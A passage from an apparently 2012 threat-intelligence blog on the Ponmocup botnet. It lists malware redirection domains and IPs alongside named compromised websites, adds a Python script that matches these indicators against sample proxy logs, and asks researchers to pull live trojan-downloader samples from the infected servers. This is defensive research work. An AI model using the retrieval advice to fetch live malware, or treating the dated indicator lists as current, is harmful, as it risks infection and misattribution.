reportedtechniques.org<br />
*.thepetserver.com<br />
*.thomasyohannan.com<br />
thousandmilitary.com<br />
trialworld.net<br />
twiceseparate.com<br />
underbuild.net<br />
vamped.wonderfulroofing.com<br />
*.vicandbarbs.net<br />
watchingsquare.com</div>
<br />
And here's the list of infected domains (servers with a malicious<span style="font-family: "Courier New",Courier,monospace;"> .htaccess </span>file)<br />
<br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">$ cat ponmocup-finder_domains-1_INFECTED.log | awk '{ print $3 }' | sort | uniq</span><br />
<span style="font-family: "Courier New",Courier,monospace;">aviationhumor.net</span><br />
<span style="font-family: "Courier New",Courier,monospace;">bgs-architekten.com</span><br />
<span style="font-family: "Courier New",Courier,monospace;">cryptonaux.co.uk</span><br />
<span style="font-family: "Courier New",Courier,monospace;">europschool.net</span><br />
<span style="font-family: "Courier New",Courier,monospace;">flowerbouquetsforweddings.com</span><br />
<span style="font-family: "Courier New",Courier,monospace;">hellokittyfighters.de</span><br />
<span style="font-family: "Courier New",Courier,monospace;">insurancepersonalpropertyassessments.com</span><br />
<span style="font-family: "Courier New",Courier,monospace;">pippatoledoshop.com</span><br />
<span style="font-family: "Courier New",Courier,monospace;">rabita-ms.ch</span><br />
<span style="font-family: "Courier New",Courier,monospace;">schoenstefaschingskostueme.com</span><br />
<span style="font-family: "Courier New",Courier,monospace;">www.apollonreisen.com</span><br />
<span style="font-family: "Courier New",Courier,monospace;">www.armsnetafrica.org</span><br />
<span style="font-family: "Courier New",Courier,monospace;">www.artistas-americanos.com</span><br />
<span style="font-family: "Courier New",Courier,monospace;">www.autocamp-nordsee.com</span><br />
<span style="font-family: "Courier New",Courier,monospace;">www.aylar.no</span><br />
<span style="font-family: "Courier New",Courier,monospace;">www.babfinance.net</span><br />
<span style="font-family: "Courier New",Courier,monospace;">www.canadawideflowers.ca</span><br />
<span style="font-family: "Courier New",Courier,monospace;">www.chinchillazucht.eu</span><br />
<span style="font-family: "Courier New",Courier,monospace;">www.demton.hu</span><br />
<span style="font-family: "Courier New",Courier,monospace;">www.dynam-med.info</span><br />
<span style="font-family: "Courier New",Courier,monospace;">www.europschool.net</span><br />
<span style="font-family: "Courier New",Courier,monospace;">www.extremebusa.com</span><br />
<span style="font-family: "Courier New",Courier,monospace;">www.feliceapicella.it</span><br />
<span style="font-family: "Courier New",Courier,monospace;">www.ferienwohnung-hotels-kroatien.de</span><br />
<span style="font-family: "Courier New",Courier,monospace;">www.flowerbouquetsforweddings.com</span><br />
<span style="font-family: "Courier New",Courier,monospace;">www.football-session.com</span><br />
<span style="font-family: "Courier New",Courier,monospace;">www.forexonlinegeheimnisse.com</span><br />
<span style="font-family: "Courier New",Courier,monospace;">www.guatemala-tourisme.info</span><br />
<span style="font-family: "Courier New",Courier,monospace;">www.hexenkostueme.com</span><br />
<span style="font-family: "Courier New",Courier,monospace;">www.hillsidebeachclub.com</span><br />
<span style="font-family: "Courier New",Courier,monospace;">www.hotelanderoper.com</span><br />
<span style="font-family: "Courier New",Courier,monospace;">www.hypequest.com</span><br />
<span style="font-family: "Courier New",Courier,monospace;">www.jenniferhejna.com</span><br />
<span style="font-family: "Courier New",Courier,monospace;">www.krcgent.be</span><br />
<span style="font-family: "Courier New",Courier,monospace;">www.lotex24.net</span><br />
<span style="font-family: "Courier New",Courier,monospace;">www.lotusnaturalspa.ch</span><br />
<span style="font-family: "Courier New",Courier,monospace;">www.moebel-direkt.net</span><br />
<span style="font-family: "Courier New",Courier,monospace;">www.oceanview-house.com</span><br />
<span style="font-family: "Courier New",Courier,monospace;">www.pr-klartext.de</span><br />
<span style="font-family: "Courier New",Courier,monospace;">www.ps3-fifaliga.de</span><br />
<span style="font-family: "Courier New",Courier,monospace;">www.radiofreecuba.com</span><br />
<span style="font-family: "Courier New",Courier,monospace;">www.smelugano2.ch</span><br />
<span style="font-family: "Courier New",Courier,monospace;">www.stadtbredimus.lu</span><br />
<span style="font-family: "Courier New",Courier,monospace;">www.stublla.net</span><br />
<span style="font-family: "Courier New",Courier,monospace;">www.sudani.co.za</span><br />
<span style="font-family: "Courier New",Courier,monospace;">www.swisshelp.info</span><br />
<span style="font-family: "Courier New",Courier,monospace;">www.thehighheelstore.com</span><br />
<span style="font-family: "Courier New",Courier,monospace;">www.theleesonhotel.com</span><br />
<span style="font-family: "Courier New",Courier,monospace;">www.titan.vc</span><br />
<span style="font-family: "Courier New",Courier,monospace;">www.vdomil.com</span><br />
<span style="font-family: "Courier New",Courier,monospace;">www.voegelitherapie.com</span><br />
<span style="font-family: "Courier New",Courier,monospace;">www.w-en-ve.nl</span><br />
<br />
I'd be curious to know what percentage (or ppm) of any list of domains would be infected. Does anyone want to take a guess?<br />
<br />
<br />Posted by TomU, 2012-05-14 (updated 2012-05-31)<br /><b>Threat Intelligence and APT Resources</b><br />This post is to share some of the resources I have found interesting and useful recently. In addition I would like to thank the friends who have interacted with me in the past and who work hard fighting cybercrime and Internet threats in general.<br />
<br />
<i>(in random order)</i><br />
<br />
Thanks to Mila from the <a href="http://contagiodump.blogspot.com/" target="_blank">contagio dump blog</a> for linking to my blog from <a href="http://contagiodump.blogspot.com/2010/07/advanced-persistent-threat-targeted.html" target="_blank">your APT page</a>, which I also recommend reading. Also very useful are the <a href="http://contagiodump.blogspot.com/2010/06/overview-of-exploit-packs-update.html" target="_blank">list of browser exploit packs</a> and all the great analyses of targeted attacks.<br />
<br />
Thanks, Keith, for mentioning my tweets on your blog (<a href="http://www.digital4rensics.com/blog/2012/02/thanks-for-sharing/" target="_blank">Thanks for Sharing</a> and <a href="http://www.digital4rensics.com/blog/2012/02/thanks-for-sharing-indicators/" target="_blank">Indicators</a>) and for the great work in posting <a href="http://ioc.forensicartifacts.com/" target="_blank">IOCs</a>.<br />
<br />
Thanks, Kyle, for the mentions in your blog post <a href="http://threatthoughts.com/2012/05/07/introduction-to-the-collective-intelligence-framework/" target="_blank">Introduction to the Collective Intelligence Framework</a>. I definitely recommend checking out <a href="http://code.google.com/p/collective-intelligence-framework/" target="_blank">CIF</a>.<br />
<br />
Thanks <a href="http://www.mandiant.com/" target="_blank">Mandiant</a> for all your <a href="http://www.mandiant.com/resources/downloads" target="_blank">free tools</a> (<a href="http://www.mandiant.com/resources/download/redline/" target="_blank">Redline</a>, <a href="http://www.mandiant.com/resources/download/ioc-finder" target="_blank">IOC-Finder</a> etc.), great resources (<a href="https://blog.mandiant.com/" target="_blank">M-unition blog</a>, <a href="http://www.mandiant.com/events/webinars/" target="_blank">webinars</a>) and interesting <a href="http://www.mandiant.com/resources/m-trends/" target="_blank">M-Trends reports</a>.<br />
<br />
Thanks <a href="https://securosis.com/" target="_blank">Securosis</a> for all the great free <a href="https://securosis.com/blog/" target="_blank">resources</a> (<a href="https://securosis.com/projectquant/malware-analysis-quant-index-of-posts" target="_blank">Malware Analysis Quant</a> etc.) and <a href="https://securosis.com/research" target="_blank">research</a> <a href="https://securosis.com/research/research-reports" target="_blank">papers</a> published.<br />
<br />
Thanks, Command-Five, for the great <a href="http://www.commandfive.com/research.html" target="_blank">research papers</a> and the free <a href="http://www.commandfive.com/downloads/c5sigma.html" target="_blank">C5 SIGMA</a> network analysis tool:<br />
<a href="http://www.commandfive.com/papers/C5_APT_C2InTheFifthDomain.pdf" target="_blank"><span class="inline-title"><i>Command and Control in the Fifth Domain</i></span></a><br />
<div class="float-left">
<a href="http://www.commandfive.com/papers/C5_APT_ADecadeInReview.pdf" target="_blank"><span class="inline-title"><i>Advanced Persistent Threats: A Decade in Review</i></span></a></div>
<br />
Here are some blog posts about APT that I can recommend reading:<br />
<br />
<div class="post-title entry-title" style="font-family: inherit;">
Eric Huber's blog post <span style="font-size: small;"><a href="http://www.ericjhuber.com/2012/05/to-apt-or-not-to-apt.html">To APT or Not To APT?</a></span></div>
<div class="post-title entry-title" style="font-family: inherit;">
<br /></div>
<div class="post-title entry-title" style="font-family: inherit;">
Mike Cloppert's blog series on SANS computer forensics<br />
<a href="http://blogs.sans.org/computer-forensics/2009/07/22/security-intelligence-introduction-pt-1/">Security Intelligence: Introduction (pt 1)</a><br />
<a href="http://blogs.sans.org/computer-forensics/2009/07/23/security-intelligence-introduction-pt-2/">Security Intelligence: Introduction (pt 2) </a><br />
<a href="https://blogs.sans.org/computer-forensics/2009/10/14/security-intelligence-attacking-the-kill-chain/">Security Intelligence: Attacking the Kill Chain</a><br />
<a href="http://blogs.sans.org/computer-forensics/2010/06/21/security-intelligence-knowing-enemy/">Security Intelligence: Defining APT Campaigns</a></div>
<div class="post-title entry-title" style="font-family: inherit;">
<br />
<i>Update 2012-05-25: </i>Here are some more interesting papers that I enjoyed.<br />
<br />
<a href="http://papers.rohanamin.com/?p=15" target="_blank">Intelligence-Driven Computer Network Defense Informed by Analysis of Adversary Campaigns and Intrusion Kill Chains</a> [<a href="http://papers.rohanamin.com/wp-content/uploads/papers.rohanamin.com/2011/08/iciw2011.pdf" target="_blank">PDF</a>]<br />
<br />
<a href="http://papers.rohanamin.com/wp-content/uploads/papers.rohanamin.com/2011/08/amin_dissertation_final.pdf" target="_blank">Detecting Targeted Malicious Email through Supervised Classification of Persistent Threat and Recipient Oriented Features</a> <i>(Dissertation by Rohan Mahesh Amin, 2011)</i><br />
<br />
<a href="http://www.contextis.com/news/articles/" target="_blank">Crouching Tiger, Hidden Dragon, Stolen Data</a> [<a href="http://www.contextis.com/news/articles/targetedattacks/Targeted_Attacks_Whitepaper.pdf" target="_blank">PDF</a>]<br />
<br />
<a href="http://www.uscc.gov/RFP/2012/USCC%20Report_Chinese_CapabilitiesforComputer_NetworkOperationsandCyberEspionage.pdf" target="_blank">Occupying the Information High Ground: Chinese Capabilities for Computer Network Operations and Cyber Espionage</a> [<a href="http://www.uscc.gov/pressreleases/2012/12_3_8.pdf" target="_blank">PR</a>]<br />
<br />
<a href="http://project2049.net/documents/pla_third_department_sigint_cyber_stokes_lin_hsiao.pdf" target="_blank">The Chinese People's Liberation Army Signals Intelligence and Cyber Reconnaissance Infrastructure</a><br />
<br />
<br /></div>
<div class="post-title entry-title" style="font-family: inherit;">
So how do you <a href="http://threatthoughts.com/2011/11/13/threat-intel-sharing-with-openioc/" target="_blank">share your threat intelligence</a> with others and how / where do you find it online?</div>
<div class="post-title entry-title" style="font-family: inherit;">
<br /></div>
<div class="post-title entry-title" style="font-family: inherit;">
I've been <a href="https://twitter.com/c_APT_ure" target="_blank">tweeting</a> some indicators in the past and collected some of these tweets on storify "<a href="http://storify.com/c_APT_ure/malware-intelligence" target="_blank">malware intelligence</a>". I've also created IOCs for <a href="https://forums.mandiant.com/topic/ioc-request-for-ponmocup-malware-botnet" target="_blank">Ponmocup</a> and other malware (<a href="http://ioc.forensicartifacts.com/2012/05/pws-zbot-gen-xj/" target="_blank">Zeus</a>, <a href="http://ioc.forensicartifacts.com/2012/05/debugger-persistence-mechanism/" target="_blank">debugger persistence</a> and <a href="https://forums.mandiant.com/topic/sysadmin-tools-and-security-features-disabled-by-malware-ioc" target="_blank">more</a>) and posted them on <a href="https://forums.mandiant.com/" target="_blank">Mandiant's forums</a> and <a href="http://ioc.forensicartifacts.com/">ioc.forensicartifacts.com</a>.</div>
<div class="post-title entry-title" style="font-family: inherit;">
<br /></div>
<div class="post-title entry-title" style="font-family: inherit;">
I will update this post eventually with new, more recent resources and infos available.</div>
<div class="post-title entry-title" style="font-family: inherit;">
<br /></div>
<div class="post-title entry-title" style="font-family: inherit;">
If you find this blog useful, consider linking to it from your blog (what, you don't have one!? Why not?) or tweeting about it.</div>
<div class="post-title entry-title" style="font-family: inherit;">
<br /></div>
<div class="post-title entry-title" style="font-family: inherit;">
If you know of other useful blogs or resources not mentioned here (or on my recommended blogs list), please let me know. </div>
<div class="post-title entry-title" style="font-family: inherit;">
<br /></div>
<div class="post-title entry-title" style="font-family: inherit;">
Thanks for reading all the way to the end ;-)</div>
<div class="post-title entry-title" style="font-family: inherit;">
<br /></div>Posted by TomU, 2012-04-27 (updated 2012-05-31)<br /><b>Hunting Ponmocup Botnet</b><br /><span style="color: red; font-style: italic; font-weight: bold;">Updated 2012-05-31: </span><span style="color: red; font-style: italic;">find new malware domains and IPs at the end of this post</span><span style="font-style: italic; font-weight: bold;"><br /></span><br />
<br />
<br />
Welcome to my third post about the <a href="http://c-apt-ure.blogspot.com/search/label/ponmocup">ponmocup</a> malware / botnet.<br />
<br />
I have some more malware intel to share, and also a request to other researchers.<br />
Following is a <a href="http://www9.dyndns-server.com:8080/pub/botnet/ponmocup/2012-04-27/ponmocup-urls-2012_a.txt">list of Ponmocup redirection domains</a>, each with the IP it resolved to, the domain of the hacked/infected website it was found on and the date on which it was discovered.<br />
<br />
<span style="font-family: courier new; font-size: 85%;">#--------------------------------------------------------------------------<br /># malware-domain malware-ip infected-website [date] (/cgi-bin/r.cgi)<br />#--------------------------------------------------------------------------<br />apartliberal.com - www.canadawideflowers.ca [22/Mar/2012]<br />apartliberal.com - www.despec.com [23/Jan/2012]<br />argumenthistorical.org - www.steingym.schulnetz.hamm.de [08/Feb/2012]<br />argumenthistorical.org - www.steingym.schulnetz.hamm.de [18/Apr/2012]<br />argumenthistorical.org - www.stv-neuenhof.ch [17/Jan/2012]<br />besidesdream.com - flowerbouquetsforweddings.com [27/Feb/2012]<br />besidesdream.com - www.armsnetafrica.org [25/Jan/2012]<br />besidesdream.com - www.flowerbouquetsforweddings.com [27/Feb/2012]<br />besidesdream.com - www.hillsidebeachclub.com [29/Mar/2012]<br />capitalinformer.com - www.hotelanderoper.com [31/Jan/2012]<br />capitalinformer.com 82.98.86.165 bgs-architekten.com [17/Apr/2012]<br />checkforsec.com 8.5.1.45 www.artistas-americanos.com [12/Apr/2012]<br />costslaid.com - halongtours.com [25/Jan/2012]<br />costslaid.com - halongtours.com [26/Jan/2012]<br />costslaid.com - www.dynam-med.info [05/Jan/2012]<br />costslaid.com - www.jenniferhejna.com [09/Feb/2012]<br />costslaid.com - www.krcgent.be [27/Mar/2012]<br />dutytraditional.net - riccardoscamarcio.org [07/Feb/2012]<br />dutytraditional.net - vivadasrestaurant.ch [11/Jan/2012]<br />dutytraditional.net - www.moebel-direkt.net [16/Jan/2012]<br />dutytraditional.net - www.moebel-direkt.net [17/Feb/2012]<br />dutytraditional.net - www.pr-klartext.de [27/Feb/2012]<br />dutytraditional.net - www.redtoo.com [20/Jan/2012]<br />dutytraditional.net - www.swisshelp.info [27/Mar/2012]<br />dutytraditional.net - www.vivadasrestaurant.com [02/Jan/2012]<br />dutytraditional.net - www.vivadasrestaurant.com [03/Jan/2012]<br />dutytraditional.net - www.vivadasrestaurant.com [09/Jan/2012]<br 
/>dutytraditional.net - www.vivadasrestaurant.com [11/Jan/2012]<br />earlyanswered.com - www.vdomil.com [30/Jan/2012]<br />everybodynames.org 94.63.149.247 www.kreutz-solutions.ch [16/Jan/2012]<br />formedtouch.com - www.voegelitherapie.com [12/Mar/2012]<br />gamecomes.org 94.63.149.247 www.ryandarts.de [08/Mar/2012]<br />handsexual.com 94.63.149.247 www.perfler.ch [10/Feb/2012]<br />handsexual.com 94.63.149.247 www.theleesonhotel.com [16/Jan/2012]<br />herocopter.com - www.aylar.no [09/Jan/2012]<br />herocopter.com - www.titan.vc [12/Jan/2012]<br />herocopter.com 199.59.241.228 www.stublla.net [23/Apr/2012]<br />herocopter.com 199.59.241.232 www.guatemala-tourisme.info [27/Mar/2012]<br />iamprotectedfrom.net - www.newtonvineyard.com [20/Apr/2012]<br />indanetwall.net - schoenstefaschingskostueme.com [27/Feb/2012]<br />indanetwall.net 199.59.241.228 www.forexonlinegeheimnisse.com [24/Apr/2012]<br />indanetwall.net 199.59.241.228 www.hexenkostueme.com [18/Apr/2012]<br />indanetwall.net 94.63.149.246 www.hexenkostueme.com [12/Jan/2012]<br />infernomag.com - cryptonaux.co.uk [06/Jan/2012]<br />infernomag.com - www.samariter-zuerich-uu.ch [24/Jan/2012]<br />interestingchapter.net - www.hypequest.com [16/Jan/2012]<br />interestingchapter.net - www.hypequest.com [17/Jan/2012]<br />interestingchapter.net - www.hypequest.com [21/Mar/2012]<br />interestingchapter.net - www.hypequest.com [30/Jan/2012]<br />jesusonlynet.org 94.63.149.246 www.babfinance.net [13/Mar/2012]<br />jesusonlynet.org 94.63.149.246 www.babfinance.net [23/Apr/2012]<br />jesusonlynet.org 94.63.149.246 www.babfinance.net [29/Mar/2012]<br />lewisentitled.com 62.212.74.224 www.extremebusa.com [20/Feb/2012]<br />lewisentitled.com 62.212.74.224 www.feliceapicella.it [16/Jan/2012]<br />lewisentitled.com 62.212.74.224 www.lotex24.net [02/Apr/2012]<br />lewisentitled.com 62.212.74.224 www.lotex24.net [03/Apr/2012]<br />lewisentitled.com 62.212.74.224 www.ps3-fifaliga.de [13/Jan/2012]<br />lewisentitled.com 
62.212.74.224 www.radiofreecuba.com [22/Mar/2012]<br />lewisentitled.com 62.212.74.224 www.thehighheelstore.com [21/Jan/2012]<br />metromanias.com - sixstringtheory.com [27/Jan/2012]<br />metromanias.com - www.boiron.ch [03/Jan/2012]<br />metromanias.com - www.boiron.ch [14/Jan/2012]<br />metromanias.com - www.midagiochi.com [26/Jan/2012]<br />metromanias.com - www.whuckaba.com [25/Jan/2012]<br />philosophymercer.com 62.212.74.228 aviationhumor.net [20/Apr/2012]<br />philosophymercer.com 62.212.74.228 dallasbbq.com [03/Jan/2012]<br />philosophymercer.com 62.212.74.228 www.football-session.com [07/Feb/2012]<br />philosophymercer.com 62.212.74.228 www.greenzer.fr [12/Jan/2012]<br />philosophymercer.com 62.212.74.228 www.greenzer.fr [19/Apr/2012]<br />philosophymercer.com 62.212.74.228 www.greenzer.fr [29/Feb/2012]<br />philosophymercer.com 62.212.74.228 www.greenzer.fr [29/Mar/2012]<br />philosophymercer.com 62.212.74.228 www.greenzer.fr [31/Mar/2012]<br />reportedtechniques.org 94.63.149.246 mjmbooks.com [23/Feb/2012]<br />reportedtechniques.org 94.63.149.246 online-aste.com [13/Mar/2012]<br />reportedtechniques.org 94.63.149.246 online-aste.com [23/Mar/2012]<br />reportedtechniques.org 94.63.149.246 www.chinchillazucht.eu [02/Mar/2012]<br />reportedtechniques.org 94.63.149.246 www.kurtlarvadisi.com [09/Jan/2012]<br />reportedtechniques.org 94.63.149.246 www.kurtlarvadisi.com [25/Jan/2012]<br />reportedtechniques.org 94.63.149.246 www.mhw-bike-house.de [27/Mar/2012]<br />reportedtechniques.org 94.63.149.246 www.panafilmforum.com [01/Feb/2012]<br />reportedtechniques.org 94.63.149.246 www.schlosstaetscher.ch [06/Jan/2012]<br />reportedtechniques.org 94.63.149.246 www.schlosstaetscher.ch [24/Jan/2012]<br />reportedtechniques.org 94.63.149.246 www.w-en-ve.nl [19/Mar/2012]<br />severalcamp.com 94.63.149.246 www.stadtbredimus.lu [07/Feb/2012]<br />sslabssys.com 208.91.197.101 www.bestofpinball.de [17/Jan/2012]<br />teethalong.org 94.63.149.246 gyro-bau.ch 
[12/Mar/2012]<br />teethalong.org 94.63.149.246 gyro-bau.ch [23/Mar/2012]<br />teethalong.org 94.63.149.246 www.brautwelt.com [15/Mar/2012]<br />teethalong.org 94.63.149.246 www.brautwelt.com [24/Apr/2012]<br />teethalong.org 94.63.149.246 www.brautwelt.com [25/Apr/2012]<br />teethalong.org 94.63.149.246 www.demton.hu [08/Feb/2012]<br />teethalong.org 94.63.149.246 www.lotusnaturalspa.ch [04/Jan/2012]<br />thousandmilitary.com - lemobilierdesign.com [01/Feb/2012]<br />thousandmilitary.com - lemobilierdesign.com [08/Feb/2012]<br />thousandmilitary.com - lemobilierdesign.com [09/Feb/2012]<br />thousandmilitary.com - lemobilierdesign.com [09/Mar/2012]<br />thousandmilitary.com - pippatoledoshop.com [18/Feb/2012]<br />thousandmilitary.com - www.lemobilierdesign.com [12/Mar/2012]<br />thousandmilitary.com - www.lemobilierdesign.com [20/Apr/2012]<br />trackallnet.com - awmusic.ca [03/Mar/2012]<br />trackallnet.com - kueppersbusch.getware.de [07/Mar/2012]<br />trackallnet.com 94.63.149.246 kueppersbusch.getware.de [13/Jan/2012]<br />trialworld.net 69.43.161.177 www.smelugano2.ch [27/Mar/2012]<br />twiceseparate.com - insurancepersonalpropertyassessments.com [18/Jan/2012]<br />underbuild.net 94.63.149.246 rabita-ms.ch [09/Feb/2012]<br />underbuild.net 94.63.149.246 www.sudani.co.za [23/Apr/2012]<br />underbuild.net 94.63.149.246 www.unterwasserkamera.at [09/Mar/2012]<br />underbuild.net 94.63.149.246 www.unterwasserkamera.at [26/Jan/2012]<br />underbuild.net 94.63.149.246 www.unterwasserkamera.at [28/Feb/2012]<br />virtualmapping.org - www.globusgateway.ch [16/Jan/2012]<br />watchingsquare.com - www.comboxansagen.com [26/Mar/2012]<br /><br />#--------------------------------------------------------------------------<br /># malware-domain malware-ip infected-website [date] (/url)<br />#--------------------------------------------------------------------------<br />52586.pballgames.com 77.79.11.96 www.apollonreisen.com [24/Apr/2012]<br />53771.peachtreepropainters.biz 
77.79.11.96 www.flyksa.com [16/Apr/2012]<br />57298.learn2drive4free.com 178.211.33.203 www.autocamp-nordsee.com [19/Apr/2012]<br />59368.3d-tablet.cc 77.79.11.96 www.europschool.net [12/Apr/2012]<br />61503.3d-tablet.cc 77.79.11.96 europschool.net [26/Apr/2012]<br />62342.thepetserver.com 77.79.11.96 www.oceanview-house.com [24/Apr/2012]<br />ceprez.recycling-computers-portland.com 176.53.112.108 hellokittyfighters.de [19/Apr/2012]<br />fckery.getbetweenthecovers.com 178.211.33.203 www.ferienwohnung-hotels-kroatien.de [12/Apr/2012]</span><br />
<br />
Of the 88 domains above, 60 servers still appear to be infected at this time.<br />
<ul>
<li><a href="http://www9.dyndns-server.com:8080/pub/botnet/ponmocup/2012-04-27/ponmocup-urls-2012_domains.txt">list of 88 domains</a></li>
<li><a href="http://www9.dyndns-server.com:8080/pub/botnet/ponmocup/2012-04-27/ponmocup-urls-2012_domains-infected.txt">list of 60 infected servers</a></li>
<li><a href="http://www9.dyndns-server.com:8080/pub/botnet/ponmocup/2012-04-27/ponmocup-urls-2012_wget-log.txt">log of wget 1</a> &amp; <a href="http://www9.dyndns-server.com:8080/pub/botnet/ponmocup/2012-04-27/ponmocup-urls-2012_wget-log_a.txt">2</a></li>
</ul>
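The following Python script is an added example for this post (not the author's own tooling) showing how to turn the list above into something you can query: it parses lines in the <span style="font-family: courier new;">malware-domain malware-ip infected-website [date]</span> format, groups the redirection domains by the IP they resolved to, records first/last seen dates per domain, and then matches the resulting indicators against a few proxy-log lines. The sample records are copied from the list above; the proxy-log lines are constructed for the demonstration, and the rule that a leading numeric label (as in 52586.pballgames.com) is stripped before matching is my assumption, based on the rotating labels visible in the "/url" section of the list.<br />

```python
"""Parse the Ponmocup redirection list into records, derive network
indicators and match them against log lines.

Added example for this post, not the author's tooling. SAMPLE is copied
from the list in the post; PROXY_LOG is constructed for the demonstration.
"""
import re
from collections import defaultdict
from datetime import datetime

# Line format used in the post: malware-domain malware-ip infected-website [date]
# The malware-ip column is "-" where the post lists no IP.
LINE_RE = re.compile(
    r"^(?P<mal_domain>\S+)\s+(?P<mal_ip>\S+)\s+(?P<site>\S+)\s+\[(?P<date>[^\]]+)\]\s*$"
)

SAMPLE = """\
# malware-domain malware-ip infected-website [date] (/cgi-bin/r.cgi)
apartliberal.com - www.canadawideflowers.ca [22/Mar/2012]
capitalinformer.com 82.98.86.165 bgs-architekten.com [17/Apr/2012]
handsexual.com 94.63.149.247 www.perfler.ch [10/Feb/2012]
handsexual.com 94.63.149.247 www.theleesonhotel.com [16/Jan/2012]
herocopter.com 199.59.241.228 www.stublla.net [23/Apr/2012]
indanetwall.net 199.59.241.228 www.hexenkostueme.com [18/Apr/2012]
indanetwall.net 94.63.149.246 www.hexenkostueme.com [12/Jan/2012]
lewisentitled.com 62.212.74.224 www.lotex24.net [02/Apr/2012]
lewisentitled.com 62.212.74.224 www.lotex24.net [03/Apr/2012]
# malware-domain malware-ip infected-website [date] (/url)
52586.pballgames.com 77.79.11.96 www.apollonreisen.com [24/Apr/2012]
59368.3d-tablet.cc 77.79.11.96 www.europschool.net [12/Apr/2012]
"""


def parse(text):
    """Return one dict per data line; comment lines (#) and blanks are skipped."""
    records = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        m = LINE_RE.match(line)
        if not m:
            raise ValueError(f"unparsable line: {line!r}")
        rec = m.groupdict()
        rec["mal_ip"] = None if rec["mal_ip"] == "-" else rec["mal_ip"]
        rec["date"] = datetime.strptime(rec["date"], "%d/%b/%Y").date()
        records.append(rec)
    return records


def summarize(records):
    """Which redirect domains share an IP, how many distinct compromised sites
    each redirect domain was seen on, and the first/last date per domain."""
    by_ip, sites = defaultdict(set), defaultdict(set)
    first_seen, last_seen = {}, {}
    for r in records:
        d = r["mal_domain"]
        if r["mal_ip"]:
            by_ip[r["mal_ip"]].add(d)
        sites[d].add(r["site"])
        first_seen[d] = min(first_seen.get(d, r["date"]), r["date"])
        last_seen[d] = max(last_seen.get(d, r["date"]), r["date"])
    return {
        "by_ip": {ip: sorted(v) for ip, v in by_ip.items()},
        "sites_per_domain": {d: len(v) for d, v in sites.items()},
        "first_seen": first_seen,
        "last_seen": last_seen,
    }


def indicators(records):
    """Flat indicator sets: the redirect domains and the IPs they resolved to.
    The compromised websites are victims, not indicators, so they are left out."""
    domains = {r["mal_domain"] for r in records}
    ips = {r["mal_ip"] for r in records if r["mal_ip"]}
    return domains, ips


def base_domain(host):
    """Assumption: a leading all-digit label (52586.pballgames.com) rotates, so
    the registered domain underneath it is the stable part worth matching."""
    parts = host.split(".")
    return ".".join(parts[-2:]) if len(parts) > 2 and parts[0].isdigit() else host


def scan_log(lines, domains, ips):
    """Return (line_no, matched token) for lines that touch an indicator.
    Matching is on whole host/IP tokens, so an IP never matches as a substring
    of a longer address."""
    bases = {base_domain(d) for d in domains}
    token_re = re.compile(r"[A-Za-z0-9.-]+")
    hits = []
    for n, line in enumerate(lines, 1):
        for tok in token_re.findall(line):
            tok = tok.lower().strip(".")
            if tok in domains or tok in ips or base_domain(tok) in bases:
                hits.append((n, tok))
                break
    return hits


# Constructed proxy-log lines for the demonstration (not real traffic).
PROXY_LOG = [
    "2012-04-24 10:01:02 10.0.0.5 GET http://www.hexenkostueme.com/ 200",
    "2012-04-24 10:01:03 10.0.0.5 GET http://indanetwall.net/cgi-bin/r.cgi 302",
    "2012-04-24 10:01:04 10.0.0.5 GET http://61503.3d-tablet.cc/url 200",
    "2012-04-24 10:01:05 10.0.0.5 GET http://www.example.com/index.html 200",
]

if __name__ == "__main__":
    recs = parse(SAMPLE)
    doms, addrs = indicators(recs)
    print(summarize(recs)["by_ip"])
    print(scan_log(PROXY_LOG, doms, addrs))
```

Note that the visit to the compromised site (line 1) does not produce a hit on its own; only the follow-up request to the redirection domain does. The third line hits through the registered-domain rule even though 61503.3d-tablet.cc is not in the sample, which is the trade-off of that rule: a visit to the bare registered domain would hit as well.<br />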
Now part of me says "why haven't you already informed all the website owners or hosters about the hacked servers?" But the other part thinks: why not use the hacked servers to get some more current trojan-downloader samples, infect some (VM) clients and study the C&amp;C traffic to create new network indicators (since the "old" ET Snort rules seem ineffective now)?<br />
<br />
Well, and that's the <span style="font-weight: bold;">challenge or request to other malware researchers</span>, since I haven't been able to download any samples successfully recently.<br />
<br />
I've shown in the wget logs how you can (try to) download an infector sample. Try it from a "home IP" and/or a "corporate IP range" (should be safe with wget); you might get different results.<br />
<br />
Actually, after taking a closer look at the files downloaded by wget, it looks like the malware download would only work with a browser. Take a look at the scripts at the end of <a href="http://www9.dyndns-server.com:8080/pub/botnet/ponmocup/2012-04-27/wget_bgs-architekten_com.txt">one file</a>.<br />
<br />
So you probably won't get the malware using wget anymore.<br />
<br />
When infecting a client, try using a corporate IP, DNS and domain configuration, since I believe "ipconfig" is called by the trojan-downloader and its further behaviour could depend on the ipconfig output.<br />
<br />
If you're interested in researching this malware / botnet and are able to do any of the above, I'd be very interested to hear from you.<br />
<br />
Thanks for any help or feedback!<br />
<br />
@c_APT_ure<br />
<br />
<span style="font-style: italic; font-weight: bold;">Updated 2012-04-30:</span><br />
<br />
I've collected some of my tweets about the Ponmocup malware here on Storify:<br />
<a href="http://storify.com/c_APT_ure/a-v-failed-for-ponmocup-malware">http://storify.com/c_APT_ure/a-v-failed-for-ponmocup-malware</a><br />
<br />
So I found a new source of malware today, <a href="http://virusshare.com/">virusshare.com</a>, thanks to Ken!<br />
Searching for "ponmocup" I got 160 results, but I could <a href="http://www9.dyndns-server.com:8080/pub/botnet/ponmocup/VirusShare/VirusShare_search-ponmocup.htm">download only 20</a>.<br />
<br />
<div style="color: blue;">
<span style="font-style: italic; font-weight: bold;">Updated 2012-05-13:</span></div>
<i style="color: blue;">I received the results for all 160 Ponmocup samples. See additional stats at the end.</i><br />
<br />
Here is an analysis of the A/V detections of these 20 samples (number of the 20 samples detected, per engine):<br />
<br />
